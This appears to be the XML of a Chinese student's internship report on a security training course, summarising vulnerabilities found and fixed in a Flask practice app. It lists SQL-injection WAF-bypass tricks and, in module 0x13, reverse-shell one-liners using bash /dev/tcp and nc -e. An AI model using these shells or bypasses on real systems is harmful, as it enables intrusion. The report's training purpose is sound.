              <w:t>0x05 文件上传实验：在实训项目中测试了文件上传功能的安全性，发现存在路径穿越漏洞（可通过 ../../ 上传到任意目录）和 Content-Type 绕过漏洞（修改请求头即可上传任意恶意文件）。修复方案：使用 werkzeug.secure_filename() 处理文件名、新增文件魔数（Magic Number）校验验证真实文件类型、限制上传文件大小。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6273AD88">
            <w:pPr>
              <w:ind w:firstLine="420"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0AD51EAA">
            <w:pPr>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>0x06 越权：在实训项目中测试了用户权限控制的有效性，发现存在垂直越权（未登录可直接访问需要认证的页面）和水平越权（可访问其他用户的个人信息）两类漏洞。修复方案：新增 login_required 装饰器统一认证管理、在个人中心等页面校验当前用户仅能操作自己的数据。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2D061495">
            <w:pPr>
              <w:ind w:firstLine="420"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5D507424">
            <w:pPr>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>0x07 绕过：以 SQLi-LABS 靶场为实验环境，开展了 WAF 绕过 Fuzz 测试，掌握了多种绕过技术：注释符绕过（/**/）、大小写混淆（UnIoN SeLeCt）、双写绕过（UNUNIONION）、编码绕过（URL 编码、Unicode 编码）等技巧，深入理解了 WAF 检测规则与绕过思路。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="72846503">
            <w:pPr>
              <w:ind w:firstLine="420"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5C241F6C">
            <w:pPr>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>0x08 文件包含：在实训项目中测试了 /page 路由的文件读取功能，发现存在本地文件包含漏洞，可通过 ../ 路径穿越读取系统文件（/etc/passwd 等）。修复方案：使用 os.path.normpath + os.path.realpath 双重路径解析、校验文件路径严格在 pages 目录下、对读取内容做 HTML 转义同时防御 XSS。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="70D64B79">
            <w:pPr>
              <w:ind w:firstLine="420"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="681A479B">
            <w:pPr>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>0x09 CSRF 漏洞：在实训项目中测试了跨站请求伪造攻击，所有需要认证的 POST 操作均未携带 CSRF Token，攻击者可构造恶意页面诱导用户触发操作。修复方案：使用 Flask-WTF 的 CSRFProtect 中间件全局启用 CSRF 保护、所有表单添加隐藏的 csrf_token 字段。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5339FFD1">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w14:paraId="7317CE16">
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>通过本次为期九天的网络安全实训，我从 Kali Linux 基础操作到 Web 安全漏洞深度修复，系统性地构建了完整的网络安全知识体系。本次实训内容涵盖了从底层系统操作到上层 Web 应用安全的全链路技术栈，包括 0x01 Kali 系统初始化、0x02 AI 系统安装、0x03 OpenClaw+QQBot 对接、0x04 密码安全与暴力破解（含 Burp Suite 安装配置、代理设置、字典攻击、frp 漏洞分析）、0x05 文件上传漏洞、0x06 越权漏洞、0x07 WAF 绕过、0x08 文件包含、0x09 CSRF 漏洞、0x10 NPS 内网穿透、0x11 Linux 利用手法、0x12 PHP 反弹木马、0x13 Shell 反弹手法共 13 个实训模块。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="734A2809">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>在实训项目的安全加固实践中，我将上述安全知识转化为具体的漏洞修复行动，完成了 Flask 用户管理系统从初始版本到全面安全加固的完整演进，累计修复了 SQL 注入、越权、CSRF、文件上传绕过、文件包含、XSS、SSRF、SSTI 模板注入、命令注入等 9 大类安全漏洞，共计完成 20 次 Git 提交，生成 8 份 Word 格式的独立漏洞修复报告存档于 GitHub 仓库。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7EEEDFD2">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>在工具使用方面，熟练掌握了安全从业人员必备的核心技能：Kali Linux 作为渗透测试基础平台、Burp Suite 进行 HTTP 流量分析拦截与字典攻击、OpenClaw AI Agent 辅助漏洞分析报告生成、Git 进行版本管理与协同开发。特别是在 Burp Suite 的使用上，完成了从安装配置、代理设置到 Intruder 模块字典攻击的完整实战链路。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2D0D738D">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>本次实训的另一重要收获是内网渗透与系统利用能力的建立。通过 NPS 客户端配置掌握了内网穿透隧道建立方法；通过 Linux 常见利用手法学习了 SUID 提权、计划任务利用、sudo 配置错误等系统层面攻击技术；通过 PHP 反弹木马和多种 Shell 反弹手法掌握了远程控制与权限维持的核心技能。这些进阶内容让我对网络安全的理解从 Web 层深入到了系统层和网络层。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7816B03A">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>实训最大的收获是安全思维的建立。从 SQL 注入到命令注入，从越权到 CSRF，每一个漏洞的修复都让我更深刻地理解：安全不是某个独立的功能模块，而是贯穿开发全生命周期的持续过程。从攻击者视角理解漏洞利用，从防御者视角设计修复方案——这种双向思维将伴随我未来的技术成长。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="19739044"/>
          <w:p w14:paraId="01724976">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>0x13 Shell 反弹手法：掌握了多种反向 Shell 的构造方式：bash 反弹（bash -i &gt;&amp; /dev/tcp/IP/PORT 0&gt;&amp;1）、nc 反弹（nc -e /bin/sh IP PORT）、Python 反弹（socket + subprocess 实现）、PHP 反弹（fsockopen + exec 实现），理解了正向连接与反向连接的不同应用场景及防火墙穿透原理。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1878F5A8"/>
          <w:p w14:paraId="7374F3F0"/>
          <w:p w14:paraId="68BF3595"/>
          <w:p w14:paraId="0A77933D"/>
          <w:p w14:paraId="2858332C">
            <w:bookmarkStart w:id="0" w:name="_GoBack"/>
            <w:bookmarkEnd w:id="0"/>
          </w:p>
          <w:p w14:paraId="5AAFF8AC"/>
          <w:p w14:paraId="2BE3C896"/>
          <w:p w14:paraId="5C92DDC2"/>
          <w:p w14:paraId="09524F52"/>
          <w:p w14:paraId="35B9A939"/>
          <w:p w14:paraId="2E9DBE88"/>
          <w:p w14:paraId="74A3448A"/>
          <w:p w14:paraId="368959DE"/>
          <w:p w14:paraId="4E497DAD"/>
          <w:p w14:paraId="7467427E"/>
          <w:p w14:paraId="386EC426"/>
          <w:p w14:paraId="0C67C0B2"/>
          <w:p w14:paraId="03582CCF"/>
          <w:p w14:paraId="68BBA0E4"/>
          <w:p w14:paraId="011844AA"/>
          <w:p w14:paraId="1B0EEE93"/>
          <w:p w14:paraId="26E33574"/>
          <w:p w14:paraId="75865D05"/>
          <w:p w14:paraId="3EAB8203"/>
          <w:p w14:paraId="54A7929E"/>
          <w:p w14:paraId="3BB095F5"/>
          <w:p w14:paraId="0075BAB0"/>
          <w:p w14:paraId="3F87ADE1"/>
          <w:p w14:paraId="53267691"/>
          <w:p w14:paraId="059F7837"/>
          <w:p w14:paraId="51D379CC">
            <w:pPr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实习成绩评定：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="28"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>　　　　　</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>　　　　　</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="38F45A35">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="11356797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　　　　　　　　　　　　　</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>指导教师签名：　　　　　 　  年　　月　　日</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="48D3D882">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7E2D82DF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标宋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1A3"/>
    <w:rsid w:val="00014C75"/>
    <w:rsid w:val="00064C3B"/>
    <w:rsid w:val="0012306C"/>
    <w:rsid w:val="00167EDE"/>
    <w:rsid w:val="00186277"/>
    <w:rsid w:val="001F3C7C"/>
    <w:rsid w:val="002253AB"/>
    <w:rsid w:val="00255D16"/>
    <w:rsid w:val="0025635E"/>
    <w:rsid w:val="00274EA9"/>
    <w:rsid w:val="002A7F2D"/>
    <w:rsid w:val="00316A1D"/>
    <w:rsid w:val="00341D3A"/>
    <w:rsid w:val="003A0403"/>
    <w:rsid w:val="003C4C2E"/>
    <w:rsid w:val="003E3BCF"/>
    <w:rsid w:val="00462113"/>
    <w:rsid w:val="004A21D0"/>
    <w:rsid w:val="004E5D52"/>
    <w:rsid w:val="00522E64"/>
    <w:rsid w:val="005311A3"/>
    <w:rsid w:val="005A6BB6"/>
    <w:rsid w:val="005D6FE5"/>
    <w:rsid w:val="00615B46"/>
    <w:rsid w:val="00647C97"/>
    <w:rsid w:val="00700EDB"/>
    <w:rsid w:val="007430E6"/>
    <w:rsid w:val="00783921"/>
    <w:rsid w:val="00791919"/>
    <w:rsid w:val="007A3766"/>
    <w:rsid w:val="007B31DA"/>
    <w:rsid w:val="007D099B"/>
    <w:rsid w:val="008075B7"/>
    <w:rsid w:val="00875609"/>
    <w:rsid w:val="00896367"/>
    <w:rsid w:val="00951B8E"/>
    <w:rsid w:val="00980D15"/>
    <w:rsid w:val="00994083"/>
    <w:rsid w:val="0099670A"/>
    <w:rsid w:val="009E21C5"/>
    <w:rsid w:val="00A11840"/>
    <w:rsid w:val="00A50A29"/>
    <w:rsid w:val="00AD1916"/>
    <w:rsid w:val="00AD3878"/>
    <w:rsid w:val="00B42AB4"/>
    <w:rsid w:val="00BA0CEA"/>
    <w:rsid w:val="00BF0B1E"/>
    <w:rsid w:val="00C156A3"/>
    <w:rsid w:val="00C15790"/>
    <w:rsid w:val="00CA4F96"/>
    <w:rsid w:val="00CF2110"/>
    <w:rsid w:val="00D17E1C"/>
    <w:rsid w:val="00D30F9F"/>
    <w:rsid w:val="00D57298"/>
    <w:rsid w:val="00D72FB5"/>
    <w:rsid w:val="00D777F2"/>
    <w:rsid w:val="00D87266"/>
    <w:rsid w:val="00DA391A"/>
    <w:rsid w:val="00EF1BBC"/>
    <w:rsid w:val="00FE3204"/>
    <w:rsid w:val="0A7C5A7B"/>
    <w:rsid w:val="0EFF4FDF"/>
    <w:rsid w:val="1C9C0D32"/>
    <w:rsid w:val="241B61B5"/>
    <w:rsid w:val="2D053838"/>
    <w:rsid w:val="2E2E327E"/>
    <w:rsid w:val="4B47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目录3"/>
    <w:basedOn w:val="1"/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:widowControl/>
      <w:tabs>
        <w:tab w:val="left" w:leader="dot" w:pos="7370"/>
      </w:tabs>
      <w:spacing w:line="317" w:lineRule="atLeast"/>
      <w:ind w:firstLine="419"/>
      <w:textAlignment w:val="baseline"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="000000"/>
      <w:kern w:val="0"/>
      <w:szCs w:val="20"/>
      <w:u w:color="000000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="8">
    <w:name w:val="页眉 字符"/>
    <w:link w:val="4"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:kern w:val="2"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="9">
    <w:name w:val="页脚 字符"/>
    <w:link w:val="3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emf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63E65-46D0-4548-B5D4-B2DD027374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scu</Company>
  <Pages>4</Pages>
  <Words>160</Words>
  <Characters>190</Characters>
  <Lines>17</Lines>
  <Paragraphs>17</Paragraphs>
  <TotalTime>226</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>465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2025-05-20T03:46:00Z</dcterms:created>
  <dc:creator>scu</dc:creator>
  <cp:lastModifiedBy>Tora</cp:lastModifiedBy>
  <cp:lastPrinted>2021-06-21T07:21:00Z</cp:lastPrinted>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-07-27T06:11:43Z</dcterms:modified>
  <dc:title>附件４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eyJoZGlkIjoiMjMyM2FlNWZkYTM5YmNlZWYzMDgyNmRjYTdlODhiNDIiLCJ1c2VySWQiOiIyMjcxNjYwMDUifQ==</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="ICV">
    <vt:lpwstr>97D0834B8F92478FB5E56F1EB7C70F13_13</vt:lpwstr>
  </property>
</Properties>
</file>